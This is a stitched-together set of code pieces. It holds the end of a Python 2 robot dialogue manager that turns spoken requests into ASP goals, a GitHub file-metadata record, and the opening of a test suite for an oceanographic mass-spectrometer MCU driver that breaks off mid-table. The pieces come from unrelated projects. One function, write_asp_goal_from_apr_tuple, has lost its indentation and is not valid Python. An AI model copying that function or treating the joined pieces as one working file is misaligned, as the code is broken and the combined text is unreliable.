            print "apr_tuple="+str(apr_tuple) #DEBUG
            if (apr_tuple[self.asp_role_map["action"]].keys()[0] == "query"): #if the tuple parsed into a query, the role requested will be put in the "patient" slot
                role_requested_location = self.asp_role_map["patient"]
            else:
                role_requested_location = self.asp_role_map[self.role_requested]
            for candidate in apr_tuple[role_requested_location]:
                if (candidate == None):
                    continue
                confidence = apr_tuple[role_requested_location][candidate]
                role_candidates.append(candidate)
                if (candidate in self.current_asp_confidence[self.asp_role_map[self.role_requested]]):
                    #interpolate toward 1 by the new evidence's confidence
                    self.current_asp_confidence[self.asp_role_map[self.role_requested]][candidate] += (1-self.current_asp_confidence[self.asp_role_map[self.role_requested]][candidate])*confidence
                else:
                    self.current_asp_confidence[self.asp_role_map[self.role_requested]][candidate] = confidence
        #decay those things not mentioned in clarification but involved in the concerned role
        for existing_candidates in self.current_asp_confidence[self.asp_role_map[self.role_requested]]:
            if (existing_candidates not in role_candidates):
                self.current_asp_confidence[self.asp_role_map[self.role_requested]][existing_candidates] = self.current_asp_confidence[self.asp_role_map[self.role_requested]][existing_candidates]*self.confidence_decay_rate
        return highest_confidence_parse
#string together an asp goal state from an apr tuple
def write_asp_goal_from_apr_tuple(self, apr):
if (apr["action"] == "served"):
asp_function = apr["action"]+"("+apr["recipient"].split(':')[0]+","+apr["patient"].split(':')[0]+",n)"
elif (apr["action"] == "at"):
asp_function = apr["action"]+"("+apr["recipient"].split(':')[0]+",n)"
elif (apr["action"] == "query"):
asp_function = apr["action"]+"("+apr["patient"]+")"
else:
sys.stderr.write("ERROR: unrecognized apr action '"+apr["action"]+"' in dialogue manager")
return asp_function
#start a command dialogue with the user
    def get_command_from_user(self, user_response=None):
        """Run a full interactive command dialogue and return an ASP goal string.

        Resets all per-dialogue state, greets the user, then alternates
        user/system turns until every role's best understanding exceeds
        self.min_confidence_to_accept, or the user (or system, on a rejected
        assumption) terminates.  On success, accepted utterance/parse pairs
        are appended to self.utterance_parse_pairs for retraining and the
        goal string from write_asp_goal_from_apr_tuple is returned; query
        goals are instead answered verbally.  Returns None on failure.

        user_response is accepted for interface compatibility but unused here
        (TODO confirm against callers).
        """
        #greeting state
        self.current_best_asp_understanding = [[None,0],[None,0],[None,0]]
        self.current_asp_confidence = [{},{},{}]
        self.request_type = "user_initiative"
        self.role_requested = None
        self.utterances_for_goal = []
        self.utterances_for_clarification = []
        self.utterances_during_dialogue = {}
        self.dialogue_accepted_parses = {}
        #self.unmapped_words_from_utterances = []
        self.vocalize("How can I help?")
        #dialogue control loop continues until minimum confidence among arguments meets acceptable threshold
        confident_in_understanding = False
        while (confident_in_understanding == False):
            #user's turn, user initiative
            if (self.request_type == "user_initiative"):
                user_responses,user_response_class = self.get_user_response()
                best_parse_result = self.process_user_initiative_response(user_responses,user_response_class)
                if (best_parse_result != None):
                    self.dialogue_accepted_parses["goal"] = best_parse_result
                if (self.request_type == "terminate"): #user gave up in response
                    break
            #user's turn, system initiative
            elif (self.request_type == "system_initiative"):
                user_responses,user_response_class = self.get_user_response()
                best_parse_result = self.process_system_initiative_response(user_responses,user_response_class)
                print "best_parse_result = "+str(best_parse_result)+" for role "+str(self.role_requested) #DEBUG
                if (best_parse_result != None):
                    self.dialogue_accepted_parses[self.role_requested] = best_parse_result
                if (self.request_type == "terminate"): #user rejected clarification, so we made a bad choice in what to believe
                    self.request_type = "user_initiative"
                    self.role_requested = None
                    self.current_best_asp_understanding = [[None,0],[None,0],[None,0]] #start fresh
                    self.current_asp_confidence = [{},{},{}] #start fresh
                #for role in self.asp_role_map: #decay all results
                #    for existing_candidates in self.current_asp_confidence[self.asp_role_map[role]]:
                #        self.current_asp_confidence[self.asp_role_map[role]][existing_candidates] = self.current_asp_confidence[self.asp_role_map[role]][existing_candidates]*self.confidence_decay_rate
            #update internal states based on user's response
            for role in self.asp_role_map: #get new best understanding
                max_role_conf,max_role_arg = self.max_argmax(self.current_asp_confidence[self.asp_role_map[role]])
                self.current_best_asp_understanding[self.asp_role_map[role]][0] = max_role_arg
                self.current_best_asp_understanding[self.asp_role_map[role]][1] = max_role_conf
            sys.stderr.write("DEBUG: current best asp understanding: "+str(self.current_best_asp_understanding)+"\n")
            sys.stderr.write("DEBUG: current current asp confidence: "+str(self.current_asp_confidence)+"\n")
            if (min([self.current_best_asp_understanding[self.asp_role_map[role]][1] for role in self.asp_role_map]) > self.min_confidence_to_accept):
                confident_in_understanding = True
                break
            #DEBUG
            for r in self.utterances_during_dialogue:
                print r+"\t"+str(self.utterances_during_dialogue[r])+"\t"+str(self.dialogue_accepted_parses[r] if r in self.dialogue_accepted_parses else None)
            #/DEBUG
            #system's turn
            vocalize_for_user,self.roles_relatively_confident_about = self.articulate_next_state()
            self.vocalize(vocalize_for_user)
        #note all unmapped words found so far for which we have any alignment guesses from this dialogue
        #self.update_all_unmapped_words_guesses(self.unmapped_words_from_utterances)
        #terminate state reached now, so determine what response to take
        if (confident_in_understanding == True):
            #reconstruct best parse if it is missing from components
            #NOTE: this may disrupt the parser, since the constructed parses will never involve lambda expressions; something to tune
            # if (best_parse_result == None):
            #     if (self.current_best_asp_understanding[self.asp_role_map["action"]][0] == "query"):
            #         pass #the semantic parser definitely won't benefit from loading a whole expression with its lambda answer
            #     else:
            #         action_name = "bring:a" if self.current_best_asp_understanding[self.asp_role_map["action"]][0] == "served" else "walk:a"
            #         best_parse_result = "(and:<t*,t> (action:<a,t> "+action_name+")"
            #         best_parse_result += " (actionrecipient:<a,<e,t>> "+action_name+" "+self.current_best_asp_understanding[self.asp_role_map["recipient"]][0]+")"
            #         if (self.current_best_asp_understanding[self.asp_role_map["patient"]][0] != False):
            #             best_parse_result += " (actionpatient:<a,<e,t>> "+action_name+" "+self.current_best_asp_understanding[self.asp_role_map["patient"]][0]+")"
            #         best_parse_result += ")"
            #note parse pairs induced from final, correct parse, if found, for each request type
            for r in self.dialogue_accepted_parses:
                if (r in self.utterances_during_dialogue):
                    for utterance in self.utterances_during_dialogue[r]:
                        self.utterance_parse_pairs.append([utterance,self.dialogue_accepted_parses[r]])
                        sys.stderr.write("DEBUG: utterance_parse_pairs adding pair '"+utterance+"'->'"+self.dialogue_accepted_parses[r]+"'\n")
            #return the asp goal state generated
            if (self.current_best_asp_understanding[self.asp_role_map["action"]][0] == "query"):
                patient_ref = self.choose_referring_expression(self.current_best_asp_understanding[self.asp_role_map["patient"]][0],self.utterances_for_goal[-1])
                self.vocalize(patient_ref)
            else:
                self.request_type = None
                self.role_requested = None
                self.vocalize("Happy to help")
            f = open(self.log_filename,'a')
            f.write("\n")
            f.close()
            #apr_tuple_to_write_goal_from = {role:self.current_best_asp_understanding[self.asp_role_map[role]][0] for role in self.asp_role_map}
            apr_tuple_to_write_goal_from = {}
            for role in self.asp_role_map:
                apr_tuple_to_write_goal_from[role] = self.current_best_asp_understanding[self.asp_role_map[role]][0]
            return self.write_asp_goal_from_apr_tuple(apr_tuple_to_write_goal_from)
        else:
            self.vocalize("Sorry I couldn't understand.")
            f = open(self.log_filename,'a')
            f.write("\n")
            f.close()
            return None
#generate a (series) of utterances in response to last user utterance contained in poll file, or start new dialogue
    def get_command_from_user_offline(self):
        """One step of the command dialogue for the offline/polling deployment.

        Each invocation performs a single exchange: if no state pickle
        exists at self.core_filename this is a fresh session, so state is
        reset, the greeting is vocalized, and state is pickled before
        shutdown.  Otherwise state is reloaded, one user response is
        processed (user- or system-initiative, mirroring
        get_command_from_user), and either the next question is vocalized
        and state re-pickled, or — once all role confidences exceed
        self.min_confidence_to_accept — accepted utterance/parse pairs are
        logged to self.alog_filename and the ASP goal string is returned.

        Returns the goal string on success, False when the user gives up,
        and None implicitly on the intermediate (still-clarifying) calls.
        """
        #check for existing state pickle to decide whether this is the first call for the session
        try:
            f = open(self.core_filename,'rb')
            starting = False
            f.close()
        except IOError:
            starting = True
        #first call
        if (starting == True):
            #greeting state
            self.current_best_asp_understanding = [[None,0],[None,0],[None,0]]
            self.current_asp_confidence = [{},{},{}]
            self.request_type = "user_initiative"
            self.role_requested = None
            self.utterances_for_goal = []
            self.utterances_for_clarification = []
            self.utterances_during_dialogue = {}
            self.dialogue_accepted_parses = {}
            self.vocalize("How can I help?")
            self.write_core_elements_to_pickle_and_shutdown()
        #subsequent call; load data and process response
        else:
            #load dialogue state
            self.load_core_elements_from_pickle()
            #get user response
            user_responses,user_response_class = self.get_user_response()
            #dialogue control loop continues until minimum confidence among arguments meets acceptable threshold
            confident_in_understanding = False
            #user's turn, user initiative
            if (self.request_type == "user_initiative"):
                best_parse_result = self.process_user_initiative_response(user_responses,user_response_class)
                if (best_parse_result != None):
                    self.dialogue_accepted_parses["goal"] = best_parse_result
                if (self.request_type == "terminate"): #user gave up in response
                    self.vocalize("Sorry I couldn't understand.")
                    return False
            #user's turn, system initiative
            elif (self.request_type == "system_initiative"):
                best_parse_result = self.process_system_initiative_response(user_responses,user_response_class)
                print "best_parse_result = "+str(best_parse_result)+" for role "+str(self.role_requested) #DEBUG
                if (best_parse_result != None):
                    self.dialogue_accepted_parses[self.role_requested] = best_parse_result
                if (self.request_type == "terminate"): #user rejected clarification, so we made a bad choice in what to believe
                    self.request_type = "user_initiative"
                    self.role_requested = None
                    self.current_best_asp_understanding = [[None,0],[None,0],[None,0]] #start fresh
                    self.current_asp_confidence = [{},{},{}] #start fresh
                #for role in self.asp_role_map: #decay all results
                #    for existing_candidates in self.current_asp_confidence[self.asp_role_map[role]]:
                #        self.current_asp_confidence[self.asp_role_map[role]][existing_candidates] = self.current_asp_confidence[self.asp_role_map[role]][existing_candidates]*self.confidence_decay_rate
            #update internal states based on user's response
            for role in self.asp_role_map: #get new best understanding
                max_role_conf,max_role_arg = self.max_argmax(self.current_asp_confidence[self.asp_role_map[role]])
                self.current_best_asp_understanding[self.asp_role_map[role]][0] = max_role_arg
                self.current_best_asp_understanding[self.asp_role_map[role]][1] = max_role_conf
            if (min([self.current_best_asp_understanding[self.asp_role_map[role]][1] for role in self.asp_role_map]) > self.min_confidence_to_accept):
                confident_in_understanding = True
            if (confident_in_understanding == False):
                #system's turn
                vocalize_for_user,self.roles_relatively_confident_about = self.articulate_next_state()
                self.vocalize(vocalize_for_user)
                self.write_core_elements_to_pickle_and_shutdown()
            else:
                #log parse pairs induced from final, correct parse, if found, for each request type
                f = open(self.alog_filename,'a')
                for r in self.dialogue_accepted_parses:
                    if (r in self.utterances_during_dialogue):
                        for utterance in self.utterances_during_dialogue[r]:
                            f.write(utterance+"\n"+self.dialogue_accepted_parses[r]+"\n\n")
                f.close()
                #return the asp goal state generated
                if (self.current_best_asp_understanding[self.asp_role_map["action"]][0] == "query"):
                    patient_ref = self.choose_referring_expression(self.current_best_asp_understanding[self.asp_role_map["patient"]][0],self.utterances_for_goal[-1])
                    self.request_type = None
                    self.role_requested = None
                    self.vocalize(patient_ref)
                    self.vocalize("Happy to help")
                else:
                    self.request_type = None
                    self.role_requested = None
                    self.vocalize("Happy to help")
                f = open(self.log_filename,'a')
                f.write("\n")
                f.close()
                #apr_tuple_to_write_goal_from = {role:self.current_best_asp_understanding[self.asp_role_map[role]][0] for role in self.asp_role_map}
                apr_tuple_to_write_goal_from = {}
                for role in self.asp_role_map:
                    apr_tuple_to_write_goal_from[role] = self.current_best_asp_understanding[self.asp_role_map[role]][0]
                return self.write_asp_goal_from_apr_tuple(apr_tuple_to_write_goal_from)
|
{
"content_hash": "1d9bfeb0c6793b265ccccf8a97a78cff",
"timestamp": "",
"source": "github",
"line_count": 993,
"max_line_length": 333,
"avg_line_length": 53.066465256797585,
"alnum_prop": 0.7088338552044786,
"repo_name": "pato/bwi_experimental",
"id": "be4d8b3b8c4d7036fed725782f3fad72be9368c9",
"size": "52695",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bwi_rlg/agent/dialog/dialogue_manager.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "605"
},
{
"name": "C",
"bytes": "117"
},
{
"name": "C++",
"bytes": "351808"
},
{
"name": "CMake",
"bytes": "11337"
},
{
"name": "CSS",
"bytes": "63380"
},
{
"name": "HTML",
"bytes": "2128397"
},
{
"name": "JavaScript",
"bytes": "86908"
},
{
"name": "Lex",
"bytes": "6253"
},
{
"name": "PHP",
"bytes": "2605"
},
{
"name": "Python",
"bytes": "107798"
},
{
"name": "Yacc",
"bytes": "2976"
}
],
"symlink_target": ""
}
|
"""
@package mi.instrument.harvard.massp.mcu.test.test_driver
@file marine-integrations/mi/instrument/harvard/massp/mcu/driver.py
@author Peter Cable
@brief Test cases for mcu driver
USAGE:
Make tests verbose and provide stdout
* From the IDK
$ bin/test_driver
$ bin/test_driver -u [-t testname]
$ bin/test_driver -i [-t testname]
$ bin/test_driver -q [-t testname]
"""
import time
from nose.plugins.attrib import attr
from mock import Mock
import ntplib
from mi.core.exceptions import SampleException, InstrumentCommandException
from mi.core.instrument.data_particle import RawDataParticle
from mi.core.instrument.port_agent_client import PortAgentPacket
from mi.core.log import get_logger
from mi.idk.unit_test import InstrumentDriverTestCase, ParameterTestConfigKey, AgentCapabilityType
from mi.idk.unit_test import InstrumentDriverUnitTestCase
from mi.idk.unit_test import InstrumentDriverIntegrationTestCase
from mi.idk.unit_test import InstrumentDriverQualificationTestCase
from mi.idk.unit_test import DriverTestMixin
from mi.core.instrument.instrument_driver import DriverConfigKey, ResourceAgentState, DriverProtocolState
from mi.core.instrument.chunker import StringChunker
from mi.instrument.harvard.massp.mcu.driver import InstrumentDriver
from mi.instrument.harvard.massp.mcu.driver import McuStatusParticleKey
from mi.instrument.harvard.massp.mcu.driver import DataParticleType
from mi.instrument.harvard.massp.mcu.driver import InstrumentCommand
from mi.instrument.harvard.massp.mcu.driver import ProtocolState
from mi.instrument.harvard.massp.mcu.driver import ProtocolEvent
from mi.instrument.harvard.massp.mcu.driver import Capability
from mi.instrument.harvard.massp.mcu.driver import Parameter
from mi.instrument.harvard.massp.mcu.driver import ParameterConstraint
from mi.instrument.harvard.massp.mcu.driver import Protocol
from mi.instrument.harvard.massp.mcu.driver import Prompt
from mi.instrument.harvard.massp.mcu.driver import NEWLINE
__author__ = 'Peter Cable'
__license__ = 'Apache 2.0'
# Module-level logger shared by every test case in this file.
log = get_logger()
# Startup configuration handed to the driver under test; these parameter
# values are applied by the protocol during its init sequence.
mcu_startup_config = {DriverConfigKey.PARAMETERS: {
    Parameter.TELEGRAM_INTERVAL: 10000,
    Parameter.ONE_MINUTE: 1000,
    Parameter.SAMPLE_TIME: 10
}}
###
# Driver parameters for the tests
###
# Register this driver module/class with the IDK test harness; the resource id,
# agent name and packet config are consumed by the integration/qual test bases.
InstrumentDriverTestCase.initialize(
    driver_module='mi.instrument.harvard.massp.mcu.driver',
    driver_class="InstrumentDriver",
    instrument_agent_resource_id='IN2N03',
    instrument_agent_name='harvard_massp_mcu',
    instrument_agent_packet_config=DataParticleType(),
    driver_startup_config=mcu_startup_config
)
#################################### RULES ####################################
# #
# Common capabilities in the base class #
# #
# Instrument specific stuff in the derived class #
# #
# Generator spits out either stubs or comments describing test this here, #
# test that there. #
# #
# Qualification tests are driven through the instrument_agent #
# #
###############################################################################
###
# Driver constant definitions
###
# Well-formed status telegram with simple sequential placeholder values;
# used for structural (chunker/parser) checks, not value verification.
TELEGRAM_1 = 'DATA,POW:0:1:2:3:4:5:6:7:8:9:10,' + \
             'PRE:1:2:3:4,' + \
             'INT:1:2:3:4:5:6:7:8:9:10,' + \
             'EXT:1:2:3,' + \
             'EXTST:1:2:3,' + \
             'POWST:0:1:2:3:4:5:6:7:8:9:10:11:12,' + \
             'SOLST:1:2:3:4:5:6,' + \
             'CAL:0:1:2:3:4:1:2:3:4,' + \
             'HEAT:0:1:2:3:4:5:6:7:8:9,' + \
             'ENDDATA'
# Realistic telegram whose values match the _status_parameters expectations
# in DriverTestMixinSub; used when particle values are verified.
TELEGRAM_2 = 'DATA,POW:4967:4983:1994:4978:4978:4973:1998:5124:2003:4994:6794,' + \
             'PRE:955:938:957:955,' + \
             'INT:50:35:17:20:20:21:20:20:20:20:20,' + \
             'EXT:2.00:0.00:-1.00,' + \
             'EXTST:1:0:0,' + \
             'POWST:0:0:0:0:1:0:0:0:0:0:0:0:0,' + \
             'SOLST:0:0:0:1:0:0,' + \
             'CAL:0:0:0:0:0:10:10:1:0,' + \
             'HEAT:0:0:0:20:0:-1:-1:-1:-1:-1,' + \
             'ENDDATA'
# missing all data
BAD_TELEGRAM_1 = 'DATA,ENDDATA'
# non-integer value
BAD_TELEGRAM_2 = 'DATA,POW:a:1:2:3:4:5:6:7:8:9:10,' + \
                 'PRE:1:2:3:4,' + \
                 'INT:1:2:3:4:5:6:7:8:9:10,' + \
                 'EXT:1:2:3,' + \
                 'EXTST:1:2:3,' + \
                 'POWST:0:1:2:3:4:5:6:7:8:9:10:11:12,' + \
                 'SOLST:1:2:3:4:5:6,' + \
                 'CAL:0:1:2:3:4:1:2:3:4,' + \
                 'HEAT:0:1:2:3:4:5:6:7:8:9,' + \
                 'ENDDATA'
# missing one value
BAD_TELEGRAM_3 = 'DATA,POW:0:1:2:3:4:5:6:7:8:9,' + \
                 'PRE:1:2:3:4,' + \
                 'INT:1:2:3:4:5:6:7:8:9:10,' + \
                 'EXT:1:2:3,' + \
                 'EXTST:1:2:3,' + \
                 'POWST:0:1:2:3:4:5:6:7:8:9:10:11:12,' + \
                 'SOLST:1:2:3:4:5:6,' + \
                 'CAL:0:1:2:3:4:1:2:3:4,' + \
                 'HEAT:0:1:2:3:4:5:6:7:8:9,' + \
                 'ENDDATA'
###############################################################################
# DRIVER TEST MIXIN #
# Defines a set of constants and assert methods used for data particle #
# verification #
# #
# In python mixin classes are classes designed such that they wouldn't be #
# able to stand on their own, but are inherited by other classes generally #
# using multiple inheritance. #
# #
# This class defines a configuration structure for testing and common assert #
# methods for validating data particles. #
###############################################################################
# noinspection PyProtectedMember
class DriverTestMixinSub(DriverTestMixin):
    """
    Mixin with shared constants and assert helpers for the MCU driver tests.

    Holds the parameter/capability test configuration, canned instrument
    responses, and particle verification methods used by the unit,
    integration and qualification test cases below.
    """
    # Create some short names for the parameter test config
    TYPE = ParameterTestConfigKey.TYPE
    READONLY = ParameterTestConfigKey.READONLY
    STARTUP = ParameterTestConfigKey.STARTUP
    DA = ParameterTestConfigKey.DIRECT_ACCESS
    VALUE = ParameterTestConfigKey.VALUE
    REQUIRED = ParameterTestConfigKey.REQUIRED
    DEFAULT = ParameterTestConfigKey.DEFAULT
    STATES = ParameterTestConfigKey.STATES
    def assert_sample_data_particle(self, data_particle):
        """
        Verify a particle is a known particle to this driver and verify the particle is correct
        @param data_particle: Data particle of unknown type produced by the driver
        """
        if isinstance(data_particle, RawDataParticle):
            self.assert_particle_raw(data_particle)
        else:
            self.fail("Unknown particle detected: %s" % data_particle)
    def assert_particle_exception(self, driver, sample_data):
        """
        Verify that we can send data through the port agent and the correct particles are generated.
        Create a port agent packet, send it through got_data, then finally grab the data particle
        from the data particle queue and verify it using the passed in assert method.
        @param driver: instrument driver with mock port agent client
        @param sample_data: the byte string we want to send to the driver
        """
        try:
            # Push the data into the driver
            self._send_port_agent_packet(driver, sample_data)
            # uh oh, we shouldn't have reached this point
            self.fail('Failed to generate an exception when given bad data!')
        # NOTE: 'except X as e' replaces the Python-2-only 'except X, e' form;
        # the 'as' syntax works on Python 2.6+ and is required on Python 3.
        except SampleException as e:
            log.debug('Caught sample exception: %r', e)
    def _send_port_agent_packet(self, driver, data):
        """
        Send a port agent packet via got_data
        @param driver Instrument Driver instance
        @param data data to send
        """
        ts = ntplib.system_to_ntp_time(time.time())
        port_agent_packet = PortAgentPacket()
        port_agent_packet.attach_data(data)
        port_agent_packet.attach_timestamp(ts)
        port_agent_packet.pack_header()
        # Push the response into the driver
        driver._protocol.got_data(port_agent_packet)
    def my_send(self, driver):
        """
        Side effect function generator - will send responses based on input
        @param driver Instrument driver instance
        @returns side effect function
        """
        def inner(data):
            """
            Inner function for side effect generator
            @param data Data to send
            @returns length of response
            """
            # Look up the canned response for this command; unknown commands
            # produce no reply (inner returns None in that case).
            my_response = self.responses.get(data.strip())
            log.debug("my_send: data: %r, my_response: %r", data, my_response)
            if my_response is not None:
                self._send_port_agent_packet(driver, my_response + NEWLINE)
                return len(my_response)
        return inner
    # Canned instrument replies, keyed by the exact command string sent.
    responses = {
        InstrumentCommand.START1: Prompt.OK,
        InstrumentCommand.START2: Prompt.OK,
        InstrumentCommand.SAMPLE + '10': Prompt.SAMPLE_START,
        InstrumentCommand.CAL: Prompt.OK,
        # instrument only sends one or the other (STANDBY or ONLINE) but for testing we can send both
        InstrumentCommand.STANDBY: Prompt.OK + NEWLINE + Prompt.STANDBY + NEWLINE + Prompt.ONLINE,
        InstrumentCommand.BEAT: Prompt.BEAT,
        InstrumentCommand.NAFREG: Prompt.OK,
        InstrumentCommand.IONREG: Prompt.OK,
        InstrumentCommand.SET_TELEGRAM_INTERVAL + '00010000': Prompt.OK,
        InstrumentCommand.SET_MINUTE + '01000': Prompt.SET_MINUTE,
        InstrumentCommand.SET_WATCHDOG: Prompt.OK,
    }
    # Expected type/access/startup-value metadata for each driver parameter.
    _driver_parameters = {
        Parameter.TELEGRAM_INTERVAL: {TYPE: int, READONLY: False, DA: False, STARTUP: True, VALUE: 10000},
        Parameter.ONE_MINUTE: {TYPE: int, READONLY: True, DA: False, STARTUP: True, VALUE: 1000},
        Parameter.SAMPLE_TIME: {TYPE: int, READONLY: False, DA: False, STARTUP: True, VALUE: 10},
        Parameter.ERROR_REASON: {TYPE: str, READONLY: True, DA: False, STARTUP: False, VALUE: ''},
    }
    # Protocol states from which each capability may be invoked.
    _driver_capabilities = {
        # capabilities defined in the IOS
        Capability.DISCOVER: {STATES: [ProtocolState.UNKNOWN]},
        Capability.START1: {STATES: [ProtocolState.COMMAND]},
        Capability.START2: {STATES: [ProtocolState.START1]},
        Capability.SAMPLE: {STATES: [ProtocolState.WAITING_RGA]},
        Capability.STANDBY: {STATES: [ProtocolState.WAITING_TURBO, ProtocolState.WAITING_RGA,
                                      ProtocolState.SAMPLE, ProtocolState.REGEN]},
        Capability.CLEAR: {STATES: [ProtocolState.ERROR]},
        Capability.IONREG: {STATES: [ProtocolState.COMMAND]},
        Capability.NAFREG: {STATES: [ProtocolState.COMMAND]},
        Capability.POWEROFF: {STATES: [ProtocolState.COMMAND]},
        Capability.CALIBRATE: {STATES: [ProtocolState.WAITING_RGA]},
    }
    # Full FSM map: every protocol state and the events it must report.
    _capabilities = {
        ProtocolState.UNKNOWN: ['DRIVER_EVENT_DISCOVER',
                                'PROTOCOL_EVENT_ERROR'],
        ProtocolState.COMMAND: ['DRIVER_EVENT_GET',
                                'DRIVER_EVENT_SET',
                                'PROTOCOL_EVENT_ERROR',
                                'PROTOCOL_EVENT_POWEROFF',
                                'DRIVER_EVENT_START_DIRECT',
                                'PROTOCOL_EVENT_NAFREG',
                                'PROTOCOL_EVENT_IONREG',
                                'PROTOCOL_EVENT_START1'],
        ProtocolState.START1: ['PROTOCOL_EVENT_START1_COMPLETE',
                               'PROTOCOL_EVENT_STANDBY',
                               'PROTOCOL_EVENT_ERROR'],
        ProtocolState.START2: ['PROTOCOL_EVENT_START2_COMPLETE',
                               'PROTOCOL_EVENT_STANDBY',
                               'PROTOCOL_EVENT_ERROR'],
        ProtocolState.SAMPLE: ['PROTOCOL_EVENT_SAMPLE_COMPLETE',
                               'PROTOCOL_EVENT_STANDBY',
                               'PROTOCOL_EVENT_ERROR'],
        ProtocolState.CALIBRATE: ['PROTOCOL_EVENT_CALIBRATE_COMPLETE',
                                  'PROTOCOL_EVENT_STANDBY',
                                  'PROTOCOL_EVENT_ERROR'],
        ProtocolState.REGEN: ['PROTOCOL_EVENT_STANDBY', 'PROTOCOL_EVENT_ERROR'],
        ProtocolState.STOPPING: ['PROTOCOL_EVENT_STANDBY',
                                 'PROTOCOL_EVENT_ERROR'],
        ProtocolState.WAITING_RGA: ['PROTOCOL_EVENT_SAMPLE',
                                    'PROTOCOL_EVENT_STANDBY',
                                    'DRIVER_EVENT_CALIBRATE',
                                    'PROTOCOL_EVENT_ERROR'],
        ProtocolState.WAITING_TURBO: ['PROTOCOL_EVENT_START2',
                                      'PROTOCOL_EVENT_STANDBY',
                                      'PROTOCOL_EVENT_ERROR'],
        ProtocolState.DIRECT_ACCESS: ['DRIVER_EVENT_STOP_DIRECT', 'EXECUTE_DIRECT'],
        ProtocolState.ERROR: ['PROTOCOL_EVENT_CLEAR',
                              'PROTOCOL_EVENT_STANDBY']
    }
    # Reference copy of TELEGRAM_2; the expected values below derive from it.
    """
    'DATA,POW:4967:4983:1994:4978:4978:4973:1998:5124:2003:4994:6794,' + \
    'PRE:955:938:957:955,' + \
    'INT:50:35:17:20:20:21:20:20:20:20:20,' + \
    'EXT:2.00:0.00:-1.00,' + \
    'EXTST:1:0:0,' + \
    'POWST:0:0:0:0:1:0:0:0:0:0:0:0:0,' + \
    'SOLST:0:0:0:1:0:0,' + \
    'CAL:0:0:0:0:0:10:10:1:0,' + \
    'HEAT:0:0:0:20:0:-1:-1:-1:-1:-1,' + \
    'ENDDATA'
    """
    # Expected type/value for every key of the MCU status particle (TELEGRAM_2).
    _status_parameters = {
        McuStatusParticleKey.RGA_CURRENT: {TYPE: int, VALUE: 4967, REQUIRED: True},
        McuStatusParticleKey.TURBO_CURRENT: {TYPE: int, VALUE: 4983, REQUIRED: True},
        McuStatusParticleKey.HEATER_CURRENT: {TYPE: int, VALUE: 1994, REQUIRED: True},
        McuStatusParticleKey.ROUGHING_CURRENT: {TYPE: int, VALUE: 4978, REQUIRED: True},
        McuStatusParticleKey.FAN_CURRENT: {TYPE: int, VALUE: 4978, REQUIRED: True},
        McuStatusParticleKey.SBE_CURRENT: {TYPE: int, VALUE: 4973, REQUIRED: True},
        McuStatusParticleKey.CONVERTER_24V_MAIN: {TYPE: int, VALUE: 1998, REQUIRED: True},
        McuStatusParticleKey.CONVERTER_12V_MAIN: {TYPE: int, VALUE: 5124, REQUIRED: True},
        McuStatusParticleKey.CONVERTER_24V_SEC: {TYPE: int, VALUE: 2003, REQUIRED: True},
        McuStatusParticleKey.CONVERTER_12V_SEC: {TYPE: int, VALUE: 4994, REQUIRED: True},
        McuStatusParticleKey.VALVE_CURRENT: {TYPE: int, VALUE: 6794, REQUIRED: True},
        McuStatusParticleKey.PRESSURE_P1: {TYPE: int, VALUE: 955, REQUIRED: True},
        McuStatusParticleKey.PRESSURE_P2: {TYPE: int, VALUE: 938, REQUIRED: True},
        McuStatusParticleKey.PRESSURE_P3: {TYPE: int, VALUE: 957, REQUIRED: True},
        McuStatusParticleKey.PRESSURE_P4: {TYPE: int, VALUE: 955, REQUIRED: True},
        McuStatusParticleKey.HOUSING_PRESSURE: {TYPE: int, VALUE: 50, REQUIRED: True},
        McuStatusParticleKey.HOUSING_HUMIDITY: {TYPE: int, VALUE: 35, REQUIRED: True},
        McuStatusParticleKey.TEMP_MAIN_CONTROL: {TYPE: int, VALUE: 17, REQUIRED: True},
        McuStatusParticleKey.TEMP_MAIN_ROUGH: {TYPE: int, VALUE: 20, REQUIRED: True},
        McuStatusParticleKey.TEMP_SEC_ROUGH: {TYPE: int, VALUE: 20, REQUIRED: True},
        McuStatusParticleKey.TEMP_MAIN_24V: {TYPE: int, VALUE: 21, REQUIRED: True},
        McuStatusParticleKey.TEMP_SEC_24V: {TYPE: int, VALUE: 20, REQUIRED: True},
        McuStatusParticleKey.TEMP_ANALYZER: {TYPE: int, VALUE: 20, REQUIRED: True},
        McuStatusParticleKey.TEMP_NAFION: {TYPE: int, VALUE: 20, REQUIRED: True},
        McuStatusParticleKey.TEMP_ION: {TYPE: int, VALUE: 20, REQUIRED: True},
        McuStatusParticleKey.PH_METER: {TYPE: int, VALUE: 2, REQUIRED: True},
        McuStatusParticleKey.INLET_TEMP: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.PH_STATUS: {TYPE: int, VALUE: 1, REQUIRED: True},
        McuStatusParticleKey.INLET_TEMP_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_TURBO: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_RGA: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_MAIN_ROUGH: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_SEC_ROUGH: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_FAN1: {TYPE: int, VALUE: 1, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_FAN2: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_FAN3: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_FAN4: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_AUX2: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_PH: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_PUMP: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_HEATERS: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.POWER_RELAY_AUX1: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.SAMPLE_VALVE1: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.SAMPLE_VALVE2: {TYPE: int, VALUE: 0, REQUIRED: True},
